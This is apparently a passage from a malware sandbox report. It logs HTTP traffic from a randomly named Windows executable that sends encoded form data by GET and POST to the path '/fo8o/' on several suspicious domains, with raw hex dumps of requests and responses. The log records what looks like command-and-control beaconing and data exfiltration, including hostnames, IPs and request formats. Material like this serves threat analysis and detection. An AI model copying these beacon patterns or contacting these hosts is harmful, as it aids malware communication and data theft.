            critical-ch: sec-ch-prefers-color-scheme
            vary: sec-ch-prefers-color-scheme
            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==
            set-cookie: parking_session=24f1eaba-a35b-4805-838d-dd7ad5787939; expires=Fri, 02 Aug 2024 12:08:40 GMT; path=/
            connection: close
            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 5a 48 52 77 54 63 55 41 44 7a 42 54 6f 52 4a 54 63 68 49 45 74 30 63 68 71 32 71 7a 77 76 30 56 33 54 79 52 67 48 32 39 51 2b 79 2b 59 56 74 34 7a 47 47 72 65 63 67 69 43 44 31 66 59 6d 46 69 45 2f 74 56 4c 51 62 30 48 32 35 48 55 4e 55 56 67 69 59 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
            Aug 2, 2024 13:53:40.922648907 CEST | 559 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjRmMWVhYmEtYTM1Yi00ODA1LTgzOGQtZGQ3YWQ1Nzg3OTM5IiwicGFnZV90aW1lIjoxNzIyNTk5Nj


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            44 | 192.168.2.6 | 64512 | 199.59.243.226 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:42.959279060 CEST | 521 | OUT | GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0v0tvbjYVZrXx7xEZksJc7712LnlYWiWRTV2JAY9clvZ1jJotY128= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.joyesi.xyz
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:53:43.440464973 CEST | 1236 | IN | HTTP/1.1 200 OK
            date: Fri, 02 Aug 2024 11:53:42 GMT
            content-type: text/html; charset=utf-8
            content-length: 1502
            x-request-id: 7041abb3-3e39-42ca-90e2-f20874cef9da
            cache-control: no-store, max-age=0
            accept-ch: sec-ch-prefers-color-scheme
            critical-ch: sec-ch-prefers-color-scheme
            vary: sec-ch-prefers-color-scheme
            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cK9+Xvh5JytQQz0FIssO9+FG+B/j9hc06DGyH2SgzGII7IzY/695fW1MOGS+ZcjjEaswAEqw9fi8R84wQG7XMA==
            set-cookie: parking_session=7041abb3-3e39-42ca-90e2-f20874cef9da; expires=Fri, 02 Aug 2024 12:08:43 GMT; path=/
            connection: close
            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 4b 39 2b 58 76 68 35 4a 79 74 51 51 7a 30 46 49 73 73 4f 39 2b 46 47 2b 42 2f 6a 39 68 63 30 36 44 47 79 48 32 53 67 7a 47 49 49 37 49 7a 59 2f 36 39 35 66 57 31 4d 4f 47 53 2b 5a 63 6a 6a 45 61 73 77 41 45 71 77 39 66 69 38 52 38 34 77 51 47 37 58 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cK9+Xvh5JytQQz0FIssO9+FG+B/j9hc06DGyH2SgzGII7IzY/695fW1MOGS+ZcjjEaswAEqw9fi8R84wQG7XMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
            Aug 2, 2024 13:53:43.440551996 CEST | 955 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzA0MWFiYjMtM2UzOS00MmNhLTkwZTItZjIwODc0Y2VmOWRhIiwicGFnZV90aW1lIjoxNzIyNTk5Nj


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            45 | 192.168.2.6 | 64515 | 72.52.178.23 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:56.772433043 CEST | 786 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.shenzhoucui.com
            Origin: http://www.shenzhoucui.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.shenzhoucui.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 68 69 71 34 65 61 6e 35 72 38 69 50 4f 69 59 69 56 6a 57 66 48 35 65 4a 33 34 41 58 45 59 46 38 6b 77 6f 54 79 2f 46 79 36 4f 61 57 49 75 4f 34 37 53 69 35 51 52 76 4b 74 55 7a 49 73 37 78 39 72 4d 52 4b 61 52 64 46 54 45 45 4d 50 58 31 51 43 51 64 4e 6e 39 69 2b 64 65 30 6c 44 74 45 4d 42 64 54 2b 39 65 56 71 4d 61 4b 71 35 47 72 43 6a 6d 63 43 39 61 4d 68 68 35 6b 56 70 79 4d 52 33 36 4f 61 66 52 54 56 79 53 6d 63 2f 49 74 36 70 6e 78 51 34 79 62 50 6a 5a 51 79 2f 2b 55 4d 76 4a 6a 73 2b 63 46 6f 35 4c 79 6d 62 38 4f 62 33 4a 42 44 77 4c 69 2b 76 54 42 73 74 47 4f 38
            Data Ascii: blWd=PInIcMmvPUghhiq4ean5r8iPOiYiVjWfH5eJ34AXEYF8kwoTy/Fy6OaWIuO47Si5QRvKtUzIs7x9rMRKaRdFTEEMPX1QCQdNn9i+de0lDtEMBdT+9eVqMaKq5GrCjmcC9aMhh5kVpyMR36OafRTVySmc/It6pnxQ4ybPjZQy/+UMvJjs+cFo5Lymb8Ob3JBDwLi+vTBstGO8


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            46 | 192.168.2.6 | 64516 | 72.52.178.23 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:59.307461977 CEST | 810 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.shenzhoucui.com
            Origin: http://www.shenzhoucui.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.shenzhoucui.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 68 38 6b 55 67 54 78 37 5a 79 35 4f 61 57 43 4f 4f 78 6d 69 69 45 51 52 69 39 74 52 4c 49 73 2f 68 39 72 4e 4e 4b 61 6d 70 45 51 30 45 4f 41 33 31 65 4d 77 64 4e 6e 39 69 2b 64 66 52 2b 44 74 73 4d 41 70 76 2b 39 37 68 72 46 36 4b 70 2b 47 72 43 6e 6d 63 47 39 61 4d 54 68 38 4d 72 70 33 41 52 33 2f 71 61 65 46 48 61 6e 43 6d 47 37 49 73 6c 76 48 6b 58 36 41 4b 4d 67 61 67 64 75 2b 52 72 6a 66 69 32 69 76 46 4c 72 62 53 6b 62 2b 57 70 33 70 42 70 79 4c 61 2b 39 45 4e 4c 69 79 72 66 6c 6c 51 4d 46 35 77 49 69 37 54 55 50 52 2b 4c 34 6e 76 45 75 51 3d 3d
            Data Ascii: blWd=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqh8kUgTx7Zy5OaWCOOxmiiEQRi9tRLIs/h9rNNKampEQ0EOA31eMwdNn9i+dfR+DtsMApv+97hrF6Kp+GrCnmcG9aMTh8Mrp3AR3/qaeFHanCmG7IslvHkX6AKMgagdu+Rrjfi2ivFLrbSkb+Wp3pBpyLa+9ENLiyrfllQMF5wIi7TUPR+L4nvEuQ==


            Session ID: 47, Source: 192.168.2.6:64517, Destination: 72.52.178.23:80, PID: 5700, Process: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:54:01.841324091 CEST | 1823 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.shenzhoucui.com
            Origin: http://www.shenzhoucui.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.shenzhoucui.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 70 38 6b 6d 34 54 7a 61 5a 79 34 4f 61 57 63 65 4f 30 6d 69 69 56 51 52 36 78 74 52 58 59 73 35 39 39 6b 50 46 4b 63 54 46 45 48 45 45 4f 59 48 31 66 43 51 63 50 6e 39 79 36 64 65 68 2b 44 74 73 4d 41 6f 2f 2b 37 75 56 72 44 36 4b 71 35 47 72 4f 6a 6d 63 2b 39 61 46 6b 68 38 49 37 6f 45 49 52 32 66 61 61 64 32 2f 61 6d 69 6d 59 38 49 73 74 76 48 34 59 36 41 57 75 67 61 6b 7a 75 35 5a 72 68 34 50 76 77 64 52 7a 2b 5a 57 37 4c 76 66 4b 34 2f 4e 59 36 35 62 45 35 46 4a 33 69 54 79 74 6d 55 6b 53 42 2f 49 49 69 4e 37 31 42 46 62 59 79 45 62 4a 2b 47 51 65 69 79 74 6f 63 41 52 77 33 34 4e 5a 6e 61 6e 47 42 71 33 49 79 42 72 79 65 46 48 77 71 45 39 66 64 39 45 2f 58 72 6e 68 32 38 4b 37 78 61 63 42 61 2f 39 63 63 6b 69 63 63 59 65 59 78 54 74 43 6e 38 39 61 75 7a 37 73 77 38 4f 47 38 31 41 67 66 47 48 63 6a 6d 4c 67 78 36 55 6c 6f 6a 48 30 58 6f 34 42 68 64 41 4e 6c [TRUNCATED]
            Data Ascii: blWd= [TRUNCATED]


            Session ID: 48, Source: 192.168.2.6:64518, Destination: 72.52.178.23:80, PID: 5700, Process: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:54:04.381237030 CEST | 526 | OUT | GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.shenzhoucui.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)


            Session ID: 49, Source: 192.168.2.6:64519, Destination: 194.67.71.191:80, PID: 5700, Process: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:54:10.112143040 CEST | 771 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.b301.space
            Origin: http://www.b301.space
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.b301.space/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 37 70 55 4e 41 44 38 34 4b 70 64 35 32 47 7a 54 71 76 67 75 33 31 66 65 75 62 46 52 76 45 65 4f 41 68 4a 4b 75 79 37 2b 30 31 4f 33 37 41 38 46 68 74 6e 4d 6d 46 50 4d 2f 50 67 57 47 55 78 53 31 55 38 76 46 65 6d 61 61 78 6b 73 37 6b 63 48 73 4f 78 57 62 70 49 79 4c 6a 35 38 48 72 2b 75 4e 6a 51 67 77 6b 44 6e 63 39 44 44 6e 46 73 59 75 2f 4e 47 4e 2b 50 75 56 33 4c 54 79 6e 71 66 47 38 76 42 63 31 56 5a 6b 5a 48 4c 62 66 45 30 36 48 42 56 48 66 47 69 5a 59 39 45 32 42 6a 36 62 51 49 6f 4b 77 78 32 41 68 4a 37 72 38 49 65 36 30 39 4d 37 32 6b 6f 47 57 63 2b 6d 7a 79 4d
            Data Ascii: blWd=NWf3bZRoYEuJ7pUNAD84Kpd52GzTqvgu31feubFRvEeOAhJKuy7+01O37A8FhtnMmFPM/PgWGUxS1U8vFemaaxks7kcHsOxWbpIyLj58Hr+uNjQgwkDnc9DDnFsYu/NGN+PuV3LTynqfG8vBc1VZkZHLbfE06HBVHfGiZY9E2Bj6bQIoKwx2AhJ7r8Ie609M72koGWc+mzyM
            Aug 2, 2024 13:54:10.844825983 CEST | 1236 | IN | HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:10 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Data Raw: 63 62 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 0d 96 94 48 a4 ed c6 6d 63 4b 32 d2 97 0d 03 fa 86 35 dd 30 38 29 71 45 5d 49 8c 29 5e 96 a4 6c 6b b1 81 b8 59 d7 0d cd 50 14 18 30 60 18 da 75 c3 be bb 69 dc ba 79 fd 0b d4 3f da 73 ee 25 25 92 92 63 a7 76 b1 29 b0 22 5e 9e 7b ee b9 e7 e5 39 87 e7 b2 71 b1 23 ed 68 e4 0b d6 8f 06 6e ab 41 df cc e5 5e af 59 12 5e 89 d9 2e 0f c3 66 c9 09 2d de e1 7e e4 6c 89 12 eb f0 88 d7 7d de 13 75 9a d7 2c f9 3c d8 74 bc 5e dd 0e c4 76 09 1c 04 ef b4 1a 03 11 71 66 f7 79 10 8a a8 59 fa e0 fa 2f ea af e2 9e 1a f5 f8 00 b3 02 d9 96 51 88 15 a4 17 09 0f 34 9e 74 bc 8e d8 39 91 aa 2b 5d 57 d2 42 cf 67 c6 03 bb 4f e2 26 74 7e 20 7d 11 44 a3 66 49 f6 56 43 27 12 16 89 91 59 7e 7b 7b db 68 bf b4 b8 64 84 3e b7 e7 4f 1b 06 6e 66 42 3f 8a fc 55 d3 cc cf 33 e7 ae e7 0c a0 ad d9 a9 23 39 0c 06 8e 27 8c 60 68 3a 66 a2 46 b3 e7 ca b6 95 5c 18 be d7 9b e5 d8 6d af 72 df b7 9c 4e 86 e5 f2 ab 8b 2b 57 96 af 2e af 5c 79 e5 e5 97 5f 59 49 27 69 5d 6f [TRUNCATED]
            Data Ascii: cbeZmo_qHmcK2508)qE]I)^lkYP0`uiy?s%%cv)"^{9q#hnA^Y^.f-~l}u,<t^vqfyY/Q4t9+]WBgO&t~ }DfIVC'Y~{{hd>OnfB?U3#9'`h:fF\mrN+W.\y_YI'i]o9bAv:Q[-xNp<D"'rE+z|'~?d06>?p1n=v_fpomh/607K)6KvB*5}e>mno9:go^3k;J]uIWiW5wG-Ro\~mya-(+$&=;rW[`^yuIIy4MltErz28[0#:aUrH#e+NWw"Z[<`6PZ|ieeJit#")Mbj#`&u'DVH+J:1gxs<Ki{S>T', |P`#[m&4]0+8VI%?b&5RBm0}sMw`eS pg),k;AV#127H}P`Q;CZ`YL)AHQ|XcO.?{=#^v@,ME>CrVvT|jJ< [TRUNCATED]
            Aug 2, 2024 13:54:10.844846964 CEST | 1236 | IN | Data Raw: bf 17 16 81 f6 70 80 41 65 35 cb 9a b0 cb 5d eb e0 40 a2 76 25 b2 5e c1 8b 69 4f e4 c9 b6 1c 98 1d 49 ee 65 26 94 16 7c c3 91 1d 8b 23 62 46 03 39 0c d7 95 66 9a 79 2d 2c 0c a3 81 15 22 e1 da 62 de 1d 2d 61 53 ec f8 4e 20 3a 8a d8 e6 03 9f 3b 3d
            Data Ascii: pAe5]@v%^iOIe&|#bF9fy-,"b-aSN :;= g4LfBnE$bV)|^_HN@"+Op}*Si:/M=Nw2MeiDE"-~"t [-uGZ[4_=7(co6Khf
            Aug 2, 2024 13:54:10.844861031 CEST | 976 | IN | Data Raw: 54 6f 73 9d 49 79 6e 62 30 f3 86 51 09 86 bb e1 70 17 51 fc 87 ea cf cd de ac a1 c8 4b 74 ab 4d 89 f7 5c 5f 2b a3 a9 08 9b 97 4f e3 6e 19 9e 27 39 5d 86 54 1b 5e 9d 2b 19 1d 27 f4 5d 3e 82 44 65 c7 83 70 78 be cc a9 34 ab 08 b2 54 a2 0e da 90 3e
            Data Ascii: TosIynb0QpQKtM\_+On'9]T^+']>Depx4T>`+(*eMnP/L2>|mtHLtM-fdDL6$Bk"-Az[:qO<t%*F$rp$KZ:zq;T3RWIx[X8r


            Session ID: 50, Source: 192.168.2.6:64520, Destination: 194.67.71.191:80, PID: 5700, Process: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:54:12.646102905 CEST | 795 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.b301.space
            Origin: http://www.b301.space
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.b301.space/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 4f 4f 4f 6b 74 4b 74 33 48 2b 31 31 4f 33 6a 77 38 4d 73 4e 6e 35 6d 46 44 75 2f 4b 59 57 47 53 64 53 31 57 30 76 46 70 79 56 62 68 6b 71 69 30 63 46 69 75 78 57 62 70 49 79 4c 6a 74 57 48 71 57 75 4d 58 55 67 77 47 72 6b 56 64 44 43 7a 56 73 59 71 2f 4e 43 4e 2b 50 59 56 31 2b 45 79 6c 53 66 47 39 66 42 63 67 30 50 74 5a 48 4a 52 2f 45 6c 35 45 70 52 42 76 53 6b 57 71 4a 46 33 44 57 66 54 47 4a 79 57 44 78 56 53 78 70 35 72 2b 51 73 36 55 39 6d 35 32 63 6f 55 42 51 5a 70 48 58 76 58 4a 54 67 69 58 51 78 6a 6f 71 30 65 31 6b 4f 34 57 38 42 75 77 3d 3d
            Data Ascii: blWd=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyOOOktKt3H+11O3jw8MsNn5mFDu/KYWGSdS1W0vFpyVbhkqi0cFiuxWbpIyLjtWHqWuMXUgwGrkVdDCzVsYq/NCN+PYV1+EylSfG9fBcg0PtZHJR/El5EpRBvSkWqJF3DWfTGJyWDxVSxp5r+Qs6U9m52coUBQZpHXvXJTgiXQxjoq0e1kO4W8Buw==
            Aug 2, 2024 13:54:13.348253965 CEST | 1236 | IN | HTTP/1.1 404 Not Found
            Server: nginx
            Date: Fri, 02 Aug 2024 11:54:13 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Data Raw: 63 62 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 0d 96 94 48 a4 ed c6 6d 63 4b 32 d2 97 0d 03 fa 86 35 dd 30 38 29 71 45 5d 49 8c 29 5e 96 a4 6c 6b b1 81 b8 59 d7 0d cd 50 14 18 30 60 18 da 75 c3 be bb 69 dc ba 79 fd 0b d4 3f da 73 ee 25 25 92 92 63 a7 76 b1 29 b0 22 5e 9e 7b ee b9 e7 e5 39 87 e7 b2 71 b1 23 ed 68 e4 0b d6 8f 06 6e ab 41 df cc e5 5e af 59 12 5e 89 d9 2e 0f c3 66 c9 09 2d de e1 7e e4 6c 89 12 eb f0 88 d7 7d de 13 75 9a d7 2c f9 3c d8 74 bc 5e dd 0e c4 76 09 1c 04 ef b4 1a 03 11 71 66 f7 79 10 8a a8 59 fa e0 fa 2f ea af e2 9e 1a f5 f8 00 b3 02 d9 96 51 88 15 a4 17 09 0f 34 9e 74 bc 8e d8 39 91 aa 2b 5d 57 d2 42 cf 67 c6 03 bb 4f e2 26 74 7e 20 7d 11 44 a3 66 49 f6 56 43 27 12 16 89 91 59 7e 7b 7b db 68 bf b4 b8 64 84 3e b7 e7 4f 1b 06 6e 66 42 3f 8a fc 55 d3 cc cf 33 e7 ae e7 0c a0 ad d9 a9 23 39 0c 06 8e 27 8c 60 68 3a 66 a2 46 b3 e7 ca b6 95 5c 18 be d7 9b e5 d8 6d af 72 df b7 9c 4e 86 e5 f2 ab 8b 2b 57 96 af 2e af 5c 79 e5 e5 97 5f 59 49 27 69 5d 6f [TRUNCATED]
            Data Ascii: cbeZmo_qHmcK2508)qE]I)^lkYP0`uiy?s%%cv)"^{9q#hnA^Y^.f-~l}u,<t^vqfyY/Q4t9+]WBgO&t~ }DfIVC'Y~{{hd>OnfB?U3#9'`h:fF\mrN+W.\y_YI'i]o9bAv:Q[-xNp<D"'rE+z|'~?d06>?p1n=v_fpomh/607K)6KvB*5}e>mno9:go^3k;J]uIWiW5wG-Ro\~mya-(+$&=;rW[`^yuIIy4MltErz28[0#:aUrH#e+NWw"Z[<`6PZ|ieeJit#")Mbj#`&u'DVH+J:1gxs<Ki{S>T', |P`#[m&4]0+8VI%?b&5RBm0}sMw`eS pg),k;AV#127H}P`Q;CZ`YL)AHQ|XcO.?{=#^v@,ME>CrVvT|jJ< [TRUNCATED]
